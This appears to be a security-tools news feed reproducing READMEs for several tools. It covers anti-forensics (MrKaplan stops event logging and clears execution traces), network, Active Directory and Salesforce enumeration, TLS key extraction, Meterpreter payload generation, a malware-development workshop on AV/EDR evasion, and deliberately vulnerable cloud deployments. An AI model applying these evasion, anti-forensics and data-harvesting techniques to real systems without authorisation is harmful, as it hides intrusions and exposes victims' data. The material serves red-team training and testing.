
MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution

9 August 2022 at 12:30
By: Zion3R


MrKaplan is a tool aimed at helping red teamers stay hidden by clearing evidence of execution. It works by saving information such as the time it ran and snapshots of files, and by associating each piece of evidence with the related user.

This tool is inspired by MoonWalk, a similar tool for Unix machines.

You can read more about it in the wiki page.


Features

  • Stopping event logging.
  • Clearing files artifacts.
  • Clearing registry artifacts.
  • Can run for multiple users.
  • Can run as user and as admin (Highly recommended to run as admin).
  • Can save timestamps of files.
  • Can exclude certain operations and leave artifacts to blue teams.

Usage

  • Before you start your operations on the computer, run MrKaplan with the begin flag, and when you finish, run it again with the end flag (see the sketch after this list).
  • DO NOT REMOVE MrKaplan's registry key, otherwise MrKaplan will not be able to use the information.
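
A hypothetical session is sketched below; the flag syntax is illustrative only, so consult the wiki page for the exact invocation:

# illustrative only - check the MrKaplan wiki for the real syntax
.\MrKaplan.ps1 begin    # record timestamps and file snapshots before the operation
# ... perform your operations ...
.\MrKaplan.ps1 end      # clear evidence of execution recorded since 'begin'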

IOCs

  • PowerShell processes that access the artifacts mentioned in the wiki page.

  • PowerShell importing a weird Base64 blob.

  • PowerShell processes that perform token manipulation.

  • MrKaplan's registry key: HKCU:\Software\MrKaplan.

Acknowledgements

Disclaimer

I'm not responsible in any way for any kind of damage done to your computer or programs as a result of this project. I happily accept contributions; make a pull request and I will review it!




Smap - A Drop-In Replacement For Nmap Powered By Shodan.Io

8 August 2022 at 12:30
By: Zion3R


Smap is a replica of Nmap which uses shodan.io's free API for port scanning. It takes the same command line arguments as Nmap and produces the same output, which makes it a drop-in replacement for Nmap.


Features

  • Scans 200 hosts per second
  • Doesn't require any account/api key
  • Vulnerability detection
  • Supports all nmap's output formats
  • Service and version fingerprinting
  • Makes no contact to the targets

Installation

Binaries

You can download a pre-built binary from here and use it right away.

Manual

go install -v github.com/s0md3v/smap/cmd/smap@latest

Confused or something not working? For more detailed instructions, click here

AUR package

Smap is available on AUR as smap-git (builds from source) and smap-bin (pre-built binary).

Homebrew/Mac

Smap is also available on Homebrew.

brew update
brew install smap

Usage

Smap takes the same arguments as Nmap but options other than -p, -h, -o*, -iL are ignored. If you are unfamiliar with Nmap, here's how to use Smap.

Specifying targets

smap 127.0.0.1 127.0.0.2

You can also use a list of targets, separated by newlines.

smap -iL targets.txt

Supported formats

1.1.1.1          // IPv4 address
example.com      // hostname
178.23.56.0/8    // CIDR

Output

Smap supports 6 output formats, which can be used with the -o* options as follows:

smap example.com -oX output.xml

If you want to print the output to the terminal, use a hyphen (-) as the filename.
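
For example, the following prints JSON results straight to the terminal:

smap example.com -oJ -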

Supported formats

oX    // nmap's xml format
oG    // nmap's greppable format
oN    // nmap's default format
oA    // output in all 3 formats above at once
oP    // IP:PORT pairs separated by newlines
oS    // custom smap format
oJ    // json

Note: Since Nmap doesn't scan/display vulnerabilities and tags, that data is not available in nmap's formats. Use -oS to view that info.

Specifying ports

Smap scans these 1237 ports by default. If you want to display results for certain ports, use the -p option.

smap -p21-30,80,443 -iL targets.txt

Considerations

Since Smap simply fetches existing port data from shodan.io, it is super fast, but there's more to it. You should use Smap if:

You want

  • vulnerability detection
  • a super fast port scanner
  • results for most common ports (top 1237)
  • no connections to be made to the targets

You are okay with

  • not being able to scan IPv6 addresses
  • results being up to 7 days old
  • a few false negatives


BlackStone - Pentesting Reporting Tool

7 August 2022 at 12:30
By: Zion3R



BlackStone, or the "BlackStone Project", is a tool created to automate the work of drafting and submitting a report on ethical hacking or pentesting audits.

In this tool we can register in the database the vulnerabilities that we find in the audit, classifying them by internal audit, external audit, or WiFi. In addition, we can add a description and recommendation for each one, as well as the severity level and the effort required for its correction. This information will then help us generate a criticality table in the report as a global summary of the vulnerabilities found.

We can also register a company and, just by adding its web page, the tool will be able to find subdomains, telephone numbers, social networks, employee emails...



Docker Install

Install Docker

Install docker-compose
Install BlackStone
git clone https://github.com/micro-joan/BlackStone
cd BlackStone
docker-compose up -d

User: blackstone

Password: blackstone

Manual Install

  • First we must download an Apache server to host the tool; in my case I use MAMP (I recommend following these steps): https://www.mamp.info/en/downloads/
  • We will download the content of this repository and we will have 2 folders (BlackStone and BBDD)
  • Once the server starts, we will go to C:/MAMP/htdocs and paste all the contents of the downloaded "BlackStone" folder
  • For the application to work we will have to import the database: go to your browser and open "localhost/phpMyAdmin/"; the database connection file is in the folder BlackStone/conexion.php
  • We will create a database called blackstone and import the data from the downloaded BBDD folder (sketched below)
  • Log in to BlackStone with the username and password "blackstone"
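
Sketched as shell commands, the steps above boil down to the following; the web-root path and the blackstone.sql dump filename are illustrative assumptions:

git clone https://github.com/micro-joan/BlackStone
cp -r BlackStone/* /c/MAMP/htdocs/                 # copy the app into the web root
mysql -u root -p -e "CREATE DATABASE blackstone"   # create the database
mysql -u root -p blackstone < BBDD/blackstone.sql  # import the dump (filename illustrative)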

Use

First you need to go to profile settings and add Hunter.io and haveibeenpwned.com tokens.

After having vulnerabilities in the database, we will go to the audited client section and register a client along with their web page. Once registered, we can go to customer details and see the following information:

  • Name of the business owner
  • Social networks of the company owner
  • Email and telephone number of the company owner
  • Check for exposed passwords of the company owner on the deep web
  • Subdomains of the website, as well as information of interest found in Google
  • Emails of company workers

THIS APPLICATION IS INTENDED FOR PROFESSIONAL USE ONLY; THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE.


Once we have the company that we are going to audit registered in the database, we will create a report, adding the date, the name of the report, and the company to be audited. When we register the report, we will click edit and then select the vulnerabilities that we want to appear in the report.

Finally, we will generate the report by clicking on the "overview report" button. We then save the generated page as ".mht" and open it with Word to be able to work on the generated report.



Pict - Post-Infection Collection Toolkit

6 August 2022 at 12:30
By: Zion3R


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but without them it will be unable to collect much of the intended data.

Data will be collected in two forms. The first is summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second form consists of complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes a single required parameter, the path to a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:
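
(A minimal sketch, assuming only the keys documented in the sections below; the module and class names other than browser are illustrative.)

{
    "collection_dest": "~/collection",
    "all_users": true,
    "collectors": {
        "browser": "BrowserCollector",
        "examplemodule": "ExampleCollector"
    },
    "unused": {
        "oldmodule": "OldCollector"
    },
    "settings": {
        "keepLSData": false,
        "zipIt": true
    },
    "moduleSettings": {
        "browser": {
            "collectArtifacts": false
        }
    }
}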

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

collectArtifacts specifies whether to collect the file artifacts that would normally be collected by the module. If false, all artifacts will be omitted for that module. This may be needed in cases where storage space is a consideration, and the collected artifacts are large, or in cases where the collected artifacts may represent a privacy issue for the user whose system is being analyzed.

Writing your own modules

Modules must consist of a file containing a class that is subclassed from Collector (defined in collectors/collector.py), and they must be placed in the collectors folder. A new Collector module can be easily created by duplicating the collectors/template.py file and customizing it for your own use.

def __init__(self, collectionPath, allUsers)

This method can be overridden if necessary, but the superclass's Collector.__init__() must be called in such a case, preferably before your custom code executes. This gives the object the chance to get its properties set up before your code tries to use them.

def printStartInfo(self)

This is a very simple method that will be called when this module's collection begins. Its intent is to print a message to stdout to give the user a sense of progress, by providing feedback about what is happening.

def applySettings(self, settingsDict)

This gives the module the chance to apply any custom settings. Each module can have its own self-defined settings, but the settingsDict should also be passed to the super, so that the Collector class can handle any settings that it defines.

def collect(self)

This method is the core of the module. This is called when it is time for the module to begin collection. It can write as many files as it needs to, but should confine this activity to files within the path self.collectionPath, and should use filenames that are not already taken by other modules.

If you wish to collect artifacts, don't try to do this on your own. Simply add paths to the self.pathsToCollect array, and the Collector class will take care of copying those into the appropriate subpaths in the artifacts folder, and maintaining the metadata (permissions, extended attributes, flags, etc) on the artifacts.

When the method finishes, be sure to call the super (Collector.collect(self)) to give the Collector class the chance to handle its responsibilities, such as collecting artifacts.

Your collect method can use any data collected in the basic_info.txt or lsregister.txt files found at self.collectionPath. These are collected at the beginning by the pict.py script, and can be assumed to be available for use by any other modules. However, you should not rely on output from any other modules, as there is no guarantee that the files will be available when your module runs. Modules may not run in the order they appear in your configuration JSON, since Python dictionaries are unordered.
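
Putting the methods together, a minimal custom module might look like the sketch below; the module name mycollector.py, the class name, and the collected path are illustrative, and the Collector base class is assumed to behave as described above. It would be enabled with a "mycollector": "MyCollector" entry in the collectors dictionary.

# mycollector.py - illustrative custom PICT module
import os
from collectors.collector import Collector

class MyCollector(Collector):
    def __init__(self, collectionPath, allUsers):
        # Let the base class set up its properties before custom code runs
        super().__init__(collectionPath, allUsers)

    def printStartInfo(self):
        print("Collecting example data...")

    def applySettings(self, settingsDict):
        # Handle module-specific settings here, then pass them to the super
        super().applySettings(settingsDict)

    def collect(self):
        # Write summary output, confined to self.collectionPath
        with open(os.path.join(self.collectionPath, "my_summary.txt"), "w") as f:
            f.write("example summary data\n")
        # Queue a file artifact; the Collector class copies it into the
        # artifacts folder and maintains its metadata
        self.pathsToCollect.append("/etc/hosts")
        # Give the Collector class the chance to handle its responsibilities
        Collector.collect(self)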

Credits

Thanks to Greg Neagle for FoundationPlist.py, which solved lots of problems with reading binary plists, plists containing date data types, etc.



Peetch - An eBPF Playground

5 August 2022 at 12:30
By: Zion3R


peetch is a collection of tools aimed at experimenting with different aspects of eBPF to bypass TLS protocol protections.

Currently, peetch includes two subcommands. The first, called dump, aims to sniff network traffic, associating information about the source process with each packet. The second, called tls, allows identifying processes that use OpenSSL and extracting their cryptographic keys.

Combined, these two commands make it possible to decrypt TLS exchanges recorded in the PCAPng format.


Installation

peetch relies on several dependencies, including non-merged modifications of bcc and Scapy. A Docker image can be built to easily test peetch, using the following command:

docker build -t quarkslab/peetch .

Commands Walk Through

The following examples assume that you used the following command to enter the Docker image and launch examples within it:

docker run --privileged --network host --mount type=bind,source=/sys,target=/sys --mount type=bind,source=/proc,target=/proc --rm -it quarkslab/peetch

dump

This sub-command gives you the ability to sniff packets using an eBPF TC classifier and to retrieve the corresponding PID and process names with:

peetch dump
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https S / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 SA / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https A / Padding
curl/1289291 - Ether / IP / TCP 10.211.55.10:53052 > 208.97.177.124:https PA / Raw / Padding
curl/1289291 - Ether / IP / TCP 208.97.177.124:https > 10.211.55.10:53052 A / Padding

Note that for demonstration purposes, dump will only capture IPv4 based TCP segments.

For convenience, the captured packets can be stored to PCAPng along with process information using --write:

peetch dump --write peetch.pcapng
^C

This PCAPng can easily be manipulated with Wireshark or Scapy:

scapy
>>> l = rdpcap("peetch.pcapng")
>>> l[0]
<Ether dst=00:1c:42:00:00:18 src=00:1c:42:54:f3:34 type=IPv4 |<IP version=4 ihl=5 tos=0x0 len=60 id=11088 flags=DF frag=0 ttl=64 proto=tcp chksum=0x4bb1 src=10.211.55.10 dst=208.97.177.124 |<TCP sport=53054 dport=https seq=631406526 ack=0 dataofs=10 reserved=0 flags=S window=64240 chksum=0xc3e9 urgptr=0 options=[('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1272423534, 0)), ('NOP', None), ('WScale', 7)] |<Padding load='\x00\x00' |>>>>
>>> l[0].comment
b'curl/1289909'

tls

This sub-command aims at identifying processes that use OpenSSL and makes it easy to dump several things, like plaintext and secrets.

By default, peetch tls will only display one line per process; the --directions argument makes it possible to display the exchanged messages:

peetch tls --directions
<- curl (1291078) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256
> curl (1291078) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

Displaying OpenSSL buffer content is achieved with --content.

peetch tls --content
<- curl (1290608) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

0000 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A GET / HTTP/1.1..
0010 48 6F 73 74 3A 20 77 77 77 2E 70 65 72 64 75 2E Host: www.perdu.
0020 63 6F 6D 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A com..User-Agent:
0030 20 63 75 72 6C 2F 37 2E 36 38 2E 30 0D 0A 41 63 curl/7.68.0..Ac

-> curl (1290608) 208.97.177.124/443 TLS1.-1 ECDHE-RSA-AES128-GCM-SHA256

0000 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK.
0010 0A 44 61 74 65 3A 20 54 68 75 2C 20 31 39 20 4D .Date: Thu, 19 M
0020 61 79 20 32 30 32 32 20 31 38 3A 31 36 3A 30 31 ay 2022 18:16:01
0030 20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70 GMT..Server: Ap

The --secrets argument will display TLS master secrets extracted from memory. The following example leverages --write to write master secrets to disk to simplify decrypting TLS messages with Scapy:

$ (sleep 5; curl https://www.perdu.com/?name=highly%20secret%20information --tls-max 1.2 --http1.1) &

# peetch tls --write &
curl (1293232) 208.97.177.124/443 TLS1.2 ECDHE-RSA-AES128-GCM-SHA256

# peetch dump --write traffic.pcapng
^C

# Add the master secret to a PCAPng file
$ editcap --inject-secrets tls,1293232-master_secret.log traffic.pcapng traffic-ms.pcapng

$ scapy
>>> load_layer("tls")
>>> conf.tls_session_enable = True
>>> l = rdpcap("traffic-ms.pcapng")
>>> l[13][TLS].msg
[<TLSApplicationData data='GET /?name=highly%20secret%20information HTTP/1.1\r\nHost: www.perdu.com\r\nUser-Agent: curl/7.68.0\r\nAccept: */*\r\n\r\n' |>]

Limitations

By design, peetch only supports OpenSSL and TLS 1.2.



Cirrusgo - A Fast Tool To Scan SAAS, PAAS App Written In Go

4 August 2022 at 12:30
By: Zion3R


A fast tool to scan SaaS/PaaS apps, written in Go.

Supported SaaS apps:

  • salesforce
  • contentful (next version)

Note: the -o output flag is not working.

Install: requires Go 1.18.

go install -v github.com/Ph33rr/cirrusgo/cmd/cirrusgo@latest
or
go install -v github.com/Ph33rr/CirrusGo/cmd/cirrusgo@latest


Help:

cirrusgo --help
  ______ _                           ______
/ ____/(_)_____ _____ __ __ _____ / ____/____
/ / / // ___// ___// / / // ___// / __ / __ \
/ /___ / // / / / / /_/ /(__ )/ /_/ // /_/ /
\____//_//_/ /_/ \__,_//____/ \____/ \____/ v0.0.1

cirrusgo --help

-u, --url <URL> Define single URL to fuzz
-l, --list Show App List
-c, --check only check endpoint
-V, --version Show current version
-h, --help Display its help

[cirrusgo [app] [options] ..]
cirrusgo salesforce --help

-u, --url <URL> Define single URL
-c, --check only check endpoint
-lobj, --listobj pull the object list.
-gobj --getobj pull the object.
-obj --objects set the object name. Default value is "User" object.
Juicy Objects: Case, Account, User, Contact, Document, ContentDocument, ContentVersion, ContentBody, CaseComment, Note, Employee, Attachment, EmailMessage, CaseExternalDocument, Attachment, Lead, Name, EmailTemplate, EmailMessageRelation
-gre --getrecord pull the Record id.
-re --recordid set the record id to dump the record
-cw --chkWritable check all Writable objects
-f, --full dump all pages of objects.
--dump
-H, --header <HEADER> Pass custom header to target
-proxy, --proxy <URL> Use proxy to fuzz

-o, --output <FILE> File to save results

[flags payload]
[command: cirrusgo salesforce --payload options]
-payload, --payload Generator payload for test manual Default "ObjectList"

GetItems -obj set object
-page set page
-pages set pageSize
GetRecord -re set record id
WritableOBJ -obj set object
SearchObj -obj set object
-page set page
-pages set pageSize
AuraContext -fwuid set UID
-App set AppName
-markup set markup
ObjectList no options
Dump no options
-h, --help Display its help

Example :

cirrusgo salesforce -u https://localhost -gobj

dump:

cirrusgo salesforce -u https://localhost/ -f

check Writable Objects:

cirrusgo salesforce -u https://localhost/ -cw



Kage - Graphical User Interface For Metasploit Meterpreter And Session Handler

3 August 2022 at 12:30
By: Zion3R

Kage (ka-geh) is a tool inspired by AhMyth designed for Metasploit RPC Server to interact with meterpreter sessions and generate payloads.
For now it only supports windows/meterpreter & android/meterpreter.


Getting Started

Please follow these instructions to get a copy of Kage running on your local machine without any problems.

Prerequisites

Installing

You can install Kage binaries from here.

For developers

To run the app from source code:

# Download source code
git clone https://github.com/WayzDev/Kage.git

# Install dependencies and run kage
cd Kage
yarn # or npm install
yarn run dev # or npm run dev

# to build project
yarn run build

electron-vue officially recommends the yarn package manager as it handles dependencies much better and can help reduce final build size with yarn clean.

To generate an APK payload, select the Raw format in the dropdown list.

Screenshots







Disclaimer

I will not be responsible for any direct or indirect damage caused by the usage of this tool; it is for educational purposes only.

Twitter: @iFalah

Email: [email protected]

Credits

Metasploit Framework - (c) Rapid7 Inc. 2012 (BSD License)
http://www.metasploit.com/

node-msfrpc - (c) Tomas Gonzalez Vivo. 2017 (Apache License)
https://github.com/tomasgvivo/node-msfrpc

electron-vue - (c) Greg Holguin. 2016 (MIT)
https://github.com/SimulatedGREG/electron-vue


This project was generated with electron-vue using vue-cli. Documentation about the original structure can be found here.



SilentHound - Quietly Enumerate An Active Directory Domain Via LDAP Parsing Users, Admins, Groups, Etc.

1 August 2022 at 12:30
By: Zion3R


Quietly enumerate an Active Directory Domain via LDAP parsing users, admins, groups, etc. Created by Nick Swink from Layer 8 Security.


Installation

Using pipenv (recommended method)

sudo python3 -m pip install --user pipenv
git clone https://github.com/layer8secure/SilentHound.git
cd silenthound
pipenv install

This will create an isolated virtual environment with dependencies needed for the project. To use the project you can either open a shell in the virtualenv with pipenv shell or run commands directly with pipenv run.

From requirements.txt (legacy)

This method is not recommended because python-ldap can cause many dependency errors.

Install dependencies with pip:

python3 -m pip install -r requirements.txt
python3 silenthound.py -h

Usage

$ pipenv run python silenthound.py -h
usage: silenthound.py [-h] [-u USERNAME] [-p PASSWORD] [-o OUTPUT] [-g] [-n] [-k] TARGET domain

Quietly enumerate an Active Directory environment.

positional arguments:
TARGET Domain Controller IP
domain Dot (.) separated Domain name including both contexts e.g. ACME.com / HOME.local / htb.net

optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
LDAP username - not the same as user principal name. E.g. Username: bob.dole might be 'bob
dole'
-p PASSWORD, --password PASSWORD
LDAP password - use single quotes 'password'
-o OUTPUT, --output OUTPUT
Name for output files. Creates output files for hosts, users, domain admins, and descriptions
in the current working directory.
-g, --groups Display Group names with user members.
-n, --org-unit Display Organizational Units.
-k, --keywords Search for key words in LDAP objects.

About

A lightweight tool to quickly and quietly enumerate an Active Directory environment. The goal of this tool is to get a Lay of the Land whilst making as little noise on the network as possible. The tool will make one LDAP query that is used for parsing, and create a cache file to prevent further queries/noise on the network. If no credentials are passed it will attempt anonymous BIND.

Using the -o flag will result in output files for each section that is normally printed to stdout. The files created using all flags will be:

-rw-r--r--  1 kali  kali   122 Jun 30 11:37 BASENAME-descriptions.txt
-rw-r--r--  1 kali  kali    60 Jun 30 11:37 BASENAME-domain_admins.txt
-rw-r--r--  1 kali  kali  2620 Jun 30 11:37 BASENAME-groups.txt
-rw-r--r--  1 kali  kali    89 Jun 30 11:37 BASENAME-hosts.txt
-rw-r--r--  1 kali  kali  1940 Jun 30 11:37 BASENAME-keywords.txt
-rw-r--r--  1 kali  kali    66 Jun 30 11:37 BASENAME-org.txt
-rw-r--r--  1 kali  kali   529 Jun 30 11:37 BASENAME-users.txt
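
For example, a run using all of those flags might look like this (target IP, credentials, domain, and basename are illustrative):

pipenv run python silenthound.py -u 'bob dole' -p 'Password123!' -o BASENAME -g -n -k 10.0.0.5 ACME.com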

Author

Roadmap

  • Parse users belonging to specific OUs
  • Refine output
  • Continuously cleanup code
  • Move towards OOP

For additional feature requests please submit an issue and add the enhancement tag.



PR-DNSd - Passive-Recursive DNS Daemon

1 August 2022 at 02:09
By: Zion3R


Passive-Recursive DNS daemon.


Quickstart

go get github.com/korc/PR-DNSd
sudo setcap cap_net_bind_service,cap_sys_chroot=ep go/bin/PR-DNSd
go/bin/PR-DNSd -upstream 9.9.9.9:53 -listen 127.0.0.1:53
echo nameserver 127.0.0.1 | sudo tee /etc/resolv.conf
dig google.com
dig -x $(dig +short google.com)

If you can't use setcap, you have to use the -chroot "" and -listen :<high_port> options, or run as root.

Use cases

  • run as local host DNS service, to fix your netstat/tcpview/lsof etc. output
  • as enterprise-internal DNS server, to also be able to do meaningful EDR/IR and log analysis
  • as cloud service, to also collect Passive DNS data from non-enterprise (home, BYOD etc.) devices
    • hint: you probably want to configure DDoS protection options
  • in cloud as DNS-over-TLS server, to additionally provide private DNS for supporting devices (ex: Android 9's private DNS setting)
    • ex: domain pattern based firewall/proxy configuration for mobile devices

Running as your own private server for Android 9's Private DNS settings

After appropriate setcap, run:

PR-DNSd -tlslisten :853 -cert YOUR_SERVER_CRT_KEY_PEM -upstream 1.1.1.1:53 -store pr-dnsd

Options

-cert string
TCP-TLS listener certificate (required for tls listener)
-chroot string
chroot to directory after start (default "/var/tmp")
-count int
Count of replies allowed before debounce delay is applied (default 100)
-ctmout string
Client timeout for upstream queries
-debounce string
Required time duration between UDP replies to single IP to prevent DoS (default "200ms")
-key string
TCP-TLS certificate key (default same as -cert value)
-listen string
listen address (default ":53")
-silent
Don't report normal data
-store string
Store PTR data to specified file
-tlslisten string
TCP-TLS listener address (default ":853")
-upstream string
upstream DNS server (tcp-tls:// prefix for DoT) (default "1.1.1.1:53")
(with tls and chroot, ensure ca-certificates and resolv.conf in chroot are properly set up)


Maldev-For-Dummies - A Workshop About Malware Development

29 July 2022 at 12:30
By: Zion3R


In the age of EDR, red team operators cannot get away with using pre-compiled payloads anymore. As such, malware development is becoming a vital skill for any operator. Getting started with maldev may seem daunting, but is actually very easy. This workshop will show you all you need to get started!

This repository contains the slides and accompanying exercises for the 'MalDev for Dummies' workshop that will be facilitated at Hack in Paris 2022 (additional conferences TBA). The exercises will remain available here to be completed at your own pace - the learning process should never be rushed! Issues and pull requests to this repo with questions and/or suggestions are welcomed.

Disclaimer: Malware development is a skill that can -and should- be used for good, to further the field of (offensive) security and keep our defenses sharp. If you ever use this skillset to perform activities that you have no authorization for, you are a bigger dummy than this workshop is intended for and you should skidaddle on out of here.


Workshop Description

With antivirus (AV) and Endpoint Detection and Response (EDR) tooling becoming more mature by the minute, the red team is being forced to stay ahead of the curve. Gone are the times of execute-assembly and dropping unmodified payloads on disk - if you want your engagements to last longer than a week you will have to step up your payload creation and malware development game. Starting out in this field can be daunting however, and finding the right resources is not always easy.

This workshop is aimed at beginners in the space and will guide you through your first steps as a malware developer. It is aimed primarily at offensive practitioners, but defensive practitioners are also very welcome to attend and broaden their skillset.

During the workshop we will go over some theory, after which we will set you up with a lab environment. There will be various exercises that you can complete depending on your current skillset and level of comfort with the subject. However, the aim of the workshop is to learn, and explicitly not to complete all the exercises. You are free to choose your preferred programming language for malware development, but support during the workshop is provided primarily for the C# and Nim programming languages.

During the workshop, we will discuss the key topics required to get started with building your own malware. This includes (but is not limited to):

  • The Windows API
  • Filetypes and execution methods
  • Shellcode execution and injection
  • AV and EDR evasion methods

Getting Started

To get started with malware development, you will need a dev machine so that you are not bothered by any defensive tooling that may run on your host machine. I prefer Windows for development, but Linux or MacOS will do just fine. Install your IDE of choice (I use VS Code for almost everything except C#, for which I use Visual Studio), and then install the toolchains required for your MalDev language of choice:

  • C#: Visual Studio will give you the option to include the .NET packages you will need to develop C#. If you want to develop without Visual Studio, you can download the .NET Framework separately.
  • Nim lang: Follow the download instructions. Choosenim is a convenient utility that can be used to automate the installation process.
  • Golang (not supported during workshop): Follow the download instructions.
  • Rust (not supported during workshop): Rustup can be used to install Rust along with the required toolchains.

Don't forget to disable Windows Defender or add the appropriate exclusions, so your hard work doesn't get quarantined!

Note: Oftentimes, package managers such as apt or software management tools such as Chocolatey can be used to automate the installation and management of dependencies in a convenient and repeatable way. Be conscious however that versions in package managers are often behind on the real thing! Below is an example Chocolatey command to install the mentioned tooling all at once.
 choco install -y nim choosenim go rust vscode visualstudio2019community dotnetfx

Compiling programs

Both C# and Nim are compiled languages, meaning that a compiler is used to translate your source code into binary executables of your chosen format. The process of compilation differs per language.

C#

C# code (.cs files) can either be compiled directly (with the csc utility) or via Visual Studio itself. Most source code in this repo (except the solution to bonus exercise 3) can be compiled as follows.

Note: Make sure you run the below command in a "Visual Studio Developer Command Prompt" so it knows where to find csc, it is recommended to use the "x64 Native Tools Command Prompt" for your version of Visual Studio.
csc filename.cs /unsafe

You can enable compile-time optimizations with the /optimize flag. You can hide the console window by adding /target:winexe as well, or compile as DLL with /target:library (but make sure your code structure is suitable for this).
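
For instance, an optimized GUI build and a DLL build of the same source might look like this (filename.cs is a placeholder):

csc /optimize /target:winexe filename.cs
csc /optimize /target:library filename.cs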

Nim

Nim code (.nim files) is compiled with the nim c command. The source code in this repo can be compiled as follows.

nim c filename.nim

If you want to optimize your build for size and strip debug information (much better for opsec!), you can add the following flags.

nim c -d:release -d:strip --opt:size filename.nim

Optionally you can hide the console window by adding --app:gui as well.

Dependencies

Nim

Most Nim programs depend on a library called "Winim" to interface with the Windows API. You can install the library with the Nimble package manager as follows (after installing Nim):

nimble install winim

Resources

The workshop slides reference some resources that you can use to get started. Additional resources are listed in the README.md files for every exercise!



TerraformGoat - "Vulnerable By Design" Multi Cloud Deployment Tool

28 July 2022 at 12:30
By: Zion3R


TerraformGoat is selefra research lab's "Vulnerable by Design" multi cloud deployment tool.

Currently supported cloud vendors include Alibaba Cloud, Tencent Cloud, Huawei Cloud, Amazon Web Services, Google Cloud Platform, Microsoft Azure.


Scenarios

ID Cloud Service Company Types Of Cloud Services Vulnerable Environment
1 Alibaba Cloud Networking VPC Security Group Open All Ports
2 Alibaba Cloud Networking VPC Security Group Open Common Ports
3 Alibaba Cloud Object Storage Bucket HTTP Enable
4 Alibaba Cloud Object Storage Object ACL Writable
5 Alibaba Cloud Object Storage Object ACL Readable
6 Alibaba Cloud Object Storage Special Bucket Policy
7 Alibaba Cloud Object Storage Bucket Public Access
8 Alibaba Cloud Object Storage Object Public Access
9 Alibaba Cloud Object Storage Bucket Logging Disable
10 Alibaba Cloud Object Storage Bucket Policy Readable
11 Alibaba Cloud Object Storage Bucket Object Traversal
12 Alibaba Cloud Object Storage Unrestricted File Upload
13 Alibaba Cloud Object Storage Server Side Encryption No KMS Set
14 Alibaba Cloud Object Storage Server Side Encryption Not Using BYOK
15 Alibaba Cloud Elastic Computing Service ECS SSRF
16 Alibaba Cloud Elastic Computing Service ECS Unattached Disks Are Unencrypted
17 Alibaba Cloud Elastic Computing Service ECS Virtual Machine Disks Are Unencrypted
18 Tencent Cloud Networking VPC Security Group Open All Ports
19 Tencent Cloud Networking VPC Security Group Open Common Ports
20 Tencent Cloud Object Storage Bucket ACL Writable
21 Tencent Cloud Object Storage Bucket ACL Readable
22 Tencent Cloud Object Storage Bucket Public Access
23 Tencent Cloud Object Storage Object Public Access
24 Tencent Cloud Object Storage Unrestricted File Upload
25 Tencent Cloud Object Storage Bucket Object Traversal
26 Tencent Cloud Object Storage Bucket Logging Disable
27 Tencent Cloud Object Storage Server Side Encryption Disable
28 Tencent Cloud Elastic Computing Service CVM SSRF
29 Tencent Cloud Elastic Computing Service CBS Storage Are Not Used
30 Tencent Cloud Elastic Computing Service CVM Virtual Machine Disks Are Unencrypted
31 Huawei Cloud Networking ECS Unsafe Security Group
32 Huawei Cloud Object Storage Object ACL Writable
33 Huawei Cloud Object Storage Special Bucket Policy
34 Huawei Cloud Object Storage Unrestricted File Upload
35 Huawei Cloud Object Storage Bucket Object Traversal
36 Huawei Cloud Object Storage Wrong Policy Causes Arbitrary File Uploads
37 Huawei Cloud Elastic Computing Service ECS SSRF
38 Huawei Cloud Relational Database Service RDS Mysql Baseline Checking Environment
39 Amazon Web Services Networking VPC Security Group Open All Ports
40 Amazon Web Services Networking VPC Security Group Open Common Ports
41 Amazon Web Services Object Storage Object ACL Writable
42 Amazon Web Services Object Storage Bucket ACL Writable
43 Amazon Web Services Object Storage Bucket ACL Readable
44 Amazon Web Services Object Storage MFA Delete Is Disable
45 Amazon Web Services Object Storage Special Bucket Policy
